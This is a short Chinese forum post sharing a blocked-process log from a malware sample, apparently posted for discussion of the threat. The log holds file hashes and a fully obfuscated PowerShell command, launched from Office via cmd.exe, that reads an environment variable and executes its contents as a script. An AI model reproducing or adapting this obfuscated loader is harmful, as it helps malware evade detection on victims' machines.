本帖最后由 pal家族 于 2018-11-10 08:58 编辑
来自这里样本下载的并执行的payload
http://bbs.huorong.cn/thread-50429-1-1.html
我是图
2018/11/10 8:51:56 Process action blocked Windows Command Processor DESKTOP-001342N\xzz Blocked: AAC:Office.StartInterpreter.ps C:\Windows\SysWOW64\cmd.exe
Source process file hash: 614ca7b627533e22aa3e5c3594605dc6fe6f000b0cc2b845ece47ca60673ec7f
Path to target process file: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Target process file hash: 8133502266008b77de7921451e1210b0ef3f0ed2db7d8d3ee0c3350d856fa6fa
Path to target object: pOwERsHEll . (\"{1}{0}{2}\" -f 'I','SET-','tem') ( \"{0}{3}{1}{2}\"-f'vARI','lE',':0SkX','ab' ) ( [tYPE]( \"{0}{1}{2}\"-f 'E','N','VirOnment' ) ) ; ( & (\"{1}{0}{2}\" -f'ARIA','V','blE' ) ( \"{1}{0}\" -f 'X*xT','E')).\"Val`UE\".\"INvo`kECOmM`AND\".(\"{1}{2}{3}{0}\" -f'PT','in','Vok','ESCri' ).Invoke( ( ( .('Gi' ) ( \"{0}{1}{2}\" -f 'VArIA','bLE:0S','kx')).\"Val`Ue\"::( \"{4}{1}{0}{2}{5}{3}\"-f 'E','t','nvIro','eNtVARIAbLE','ge','nM').Invoke( 'VmN',(\"{1}{0}{2}\" -f 'RoCE','P','ss' ) ) ) )
|